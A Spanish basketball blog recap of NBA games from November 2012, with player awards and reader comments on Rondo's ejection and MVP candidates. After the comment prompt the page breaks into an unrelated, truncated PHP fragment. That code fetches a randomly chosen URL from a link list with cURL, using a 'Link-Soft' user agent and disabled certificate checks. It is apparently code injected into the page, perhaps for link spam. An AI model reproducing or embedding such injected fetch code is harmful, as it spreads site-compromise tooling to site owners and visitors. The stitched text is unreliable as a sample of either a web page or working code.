La Crónica: Fin a la racha de asistencias

29 de November de 2012 por TheDeerHunter

Jornada intensa… tan intensa que a más de uno se le fue la mano. En el Brooklyn@Boston se liaba parda tras una dura falta de Humphries a Garnett. A Rondo se le cruzan los cables y se lanza como un poseso a asesinarle. En medio del tumulto que se forma, Wallace también aprovecha para repartir algún guantazo. Los 3 son expulsados y la racha de Rondo se queda en 37 partidos consecutivos con 10 o más asistencias. La de Magic son 46… y al mago tampoco le daban los ataquitos mentales que le dan a Rondo de vez en vez. Double win. Los Nets están más fuertes que los Celtics. Puede que esto en parte también fuera origen de la frustración. Anoche el banco marcó la diferencia: Watson, Stackhouse, Evans y Blatche causaron estragos (95-83).

Otros que tienen el banco para hacérselo mirar son los Blazers. Anoche tuvieron el honor de ser los primeros en caer derrotados en la capital. Partido bastante horrendo que se lo llevaron los menos malos. Jordan Crawford fue el líder de los locales (82-84).

Había morbo por ver a Harden volver al Chesapeake Arena. Lo cierto es que estuvo bastante mal, peor que Kevin Martin. En el partido no hubo color. A la bestialidad habitual de Durant se unió anoche un Ibaka desatado (98-120). 

En la parte alta de la tabla apenas sudaron los favoritos para sacar adelante sus compromisos. Los Spurs acabaron con 21 puntos de diferencia ante Orlando (110-89); los Grizzlies hicieron lo propio ante Toronto (82-103); los Knicks sólo ganaron de 14 pero lo hicieron en Milwaukee (102-88). Los Hawks sí tuvieron que emplearse a fondo contra los Bobcats y acumulan 6 victorias seguidas (91-94). En este choque, partidazo de Gordon, pero no fue suficiente ante el gran desempeño de Smith y Horford.

También hubo palizones un tanto inesperados. Los Pistons doblegaron a Phoenix 77 a 117 y eso que Monroe estuvo flojo respecto a su contribución habitual. Para alucinar el 12 de 16 de Detroit en triples, con Villanueva, Knight y Stuckey (y hasta Maggette) en delirio anotador. A ver si son capaces de repetirlo otro día. Por los Suns no merece ni comentario el partidacho que se cascaron. Buen rejón se llevaron también los Mavs de su visita a Chicago (78-101). Apagón de luces tremendo, enmarcado en que si no estás fino, la defensa de los Bulls te va a amargar el día. Bien Deng, Noah y una notable segunda unidad. Los Mavs fichan a Fisher, por cierto.

Para terminar, solvente victoria de los Jazz en Nueva Orleans (96-84) y precioso partido en el Staples, donde los Clippers superaron a duras penas a unos duros Wolves (95-101). Volvió Billups y CP3 marcó la diferencia, pero Ricky vuelve ya a los entrenamientos con el grupo. Que tiemblen.

PREMIOS

MVP: Paliza de los Thunder a los Rockets comandada por, como no, Kevin Durant. El 35 de los Thunder se fue a los 37 puntos, 7 rebotes y 4 asistencias. No se quedó lejos su compañero Serge Ibaka con 23 puntos, 9 rebotes y 6 tapones.

Rookie: El mejor del día fue de nuevo Damian Lillard. El de los Blazers anotó 20 puntos aunque con una serie de tiro más que mejorable (6 de 21). Andre Drummond anotó 6 puntos, capturó 9 rebotes y puso un par de tapones, y Pablo Prigioni no lo hizo mal dirigiendo a los Knicks y aportando 11 puntos y 7 asistencias.

Sorpresa: El destino de Ben Gordon y Charlie Villanueva quedó unido el día que ficharon los Pistons y se hicieron co-responsables de su hundimiento. A día de hoy las cosas no les van tan mal. Ayer, Gordon cuajó una buena actuación con 26 puntos (7 triples), 4 reboets y 3 asistencias y Villanueva parece redimirse  en los Pistons. Ayer anotó 19 puntos (7 de 8) y capturó 6 rebotes.

Decepción: Perder de 40 en la NBA duele pero hacerlo con los actuales Pistons… Ayer a los Suns no les salió nada, especialmente a Michael Beasley que acabó con 2 puntos (1 de 6) y 4 pérdidas. Tampoco fue el día de Jonas Valanciunas (2 puntos y 2 rebotes) ni de James Harden (3 de 16 y 3 pérdidas)

Esfuerzo en vano: Habrá que poner un ojo en Patrick Patterson. A lo mejor su buen inicio de campaña está pasando un poco desapercibido pero no es la primera vez juega a un nivel tan alto como el de ayer: 27 puntos y 6 rebotes. Lo malo es que Durant y los suyos fueron demasiado.

EL DATO

Josh Smith acabó el partido con 17 puntos, 13 rebotes, 6 asistencias y 5 tapones. Su compañero Al Horford con 17 puntos, 11 rebotes, 6 asistencias y 3 tapones. Es la segunda vez en la historia que dos jugadores del mismo equipo acaban con más de 15 puntos, 10 rebotes, 6 asistencias y 3 tapones en un mismo partido. La anterior fue en enero de 1995 cuando lo consiguieron Charles Barkely y Danny Manning.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. Laker1624 dice:
    #1

    Vaya tela con Rondo..

    Ahora a empezar de 0 para superar el record por reaccionar de esa manera en una jugada en la que no estaba ni involucrado. Aunque si hay alguien que aun puede batir el record es el por edad y calidad, siempre y cuando no se le cruzen los cables…

    POLE!!

      Citar

  2. Laker1624 dice:
    #2

    A punto de cumplir el primer mes de competicion ¿Quien dais como MVP del mes?

      Citar

  3. Esteban dice:
    #3

    Los Nets asustan, si ataque es realmente malo, pero vaya forma de defender
    Hasta la expulsion gerald wallace se estaba comiendo el mundo a base de triples y tremendos rebotes defensivos
    Jojo volvio, gracias a 4 acciones suyas los Nets impidieron en didferentes momentos arremetidas fuertes de los celtics, muy buen partido suyo

    Lopez empieza a ser quien siempre crei q podia ser, cuando sale por faltas los rivales lo festejan y hasta lo doble marcan, si harford sale de 4 en el all star, no hay un lugar para brook en los 5 iniciales?

      Citar

  4. melo15 dice:
    #4

    Carmelo en el Este y Zach Randolph en el Oeste, yo lo veo bastante claro.

      Citar

  5. Esteban dice:
    #5

    Hoy por hoy lejos carmelo, pero sera superado por durant y el rey, quienes compartiran el MVP

      Citar

  6. Laker1624 dice:
    #6

    Yo tambien veo a Melo como el MVP hasta ahora, mas que nada por la mejora de los Knicks. Si acaban entre los 3-4 primeros del Este y Melo sigue a este nivel, lo veo un candidato muy serio al MVP de la RS.

      Citar

  7. HisRoyalAirness dice:
    #7

    MVP? Melo de momento si no se duerme.

    Por cierto Garnett es escoria, en la pelea cuando se levanta del suelo le suelta un manotazo por detrás a Humpries. Un clásico suyo lo de pegar por detrás, ya se lo hizo a Duncan. Un imbécil.

      Citar

  8. Chipi dice:
    #8

    Lebron y Durant (puedo incluir a Love) nos tienen tan acostumbrados a sus monstruosas actuaciones que ya ni siquiera nos llaman la atención, así que apuesto por cualquiera de ellos como MVP. Por detrás de ellos, Carmelo si sigue en esta línea y Kobe (que está haciendo una temporada brutal) si los Lakers consiguen remontar el vuelo.

    A mí el que me tiene alucinado es Ibaka. Vaya forma de mejorar.

      Citar

  9. txusma dice:
    #9

    Laker1624:
    A punto de cumplir el primer mes de competicion ¿Quien dais como MVP del mes?

    Justo acabamos de publicar un informe sobre el primer mes de competición… Tenemos poderes adivinatorios!

      Citar

  10. nach dice:
    #10

    Rondo me da a mi que venía calentito del taponazo que le metieron poco antes xD

      Citar

  11. Laker1624 dice:
    #11

    txusma: Justo acabamos de publicar un informe sobre el primer mes de competición… Tenemos poderes adivinatorios!

    Que mal rollo…

      Citar

  12. Laker1624 dice:
    #12

    El jugadon de JoJo en la cara de Pierce me da que es un lio que se hace con la bola…

      Citar

  13. HisRoyalAirness dice:
    #13

    Puf, lo de Jojo es tremendo eh? Dejando a Pierce a la altura del betún, vaya crossover… si lo hace el idiota de Chris Paul lo estamos viendo hasta el fin de los días (sí, CP3 me cae mal)

      Citar

  14. Ruxixón dice:
    #14

    El partido de Harden fue horrible,negadísimo en el tiro,todo lo contrario a Ibaka que ayer dió el rendimiento del jugador que potencialmente podría ser.Con ese tirito de 5-6 metros afianzado vaya máquina.Y otra cosa,ayer Lin estuvo preocupante,se quedaba sin bote enseguida y eso no dice mucho a favor de un base en la élite,no sé si viene arrastrando algún tipo de problema pero no me parece buena señal.

    Muy buena respuesta de Charlotte tras el batacazo del otro día contra Oklahoma.Era clave ver qué hacína hoy y al parecer estuvieron muy metidos en el encuentro.Bravo por Dunlap.Por contra los Raptors se disuelven como un azucarillo y son los segundos peores de toda la NBA.Tienen equipo para más.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>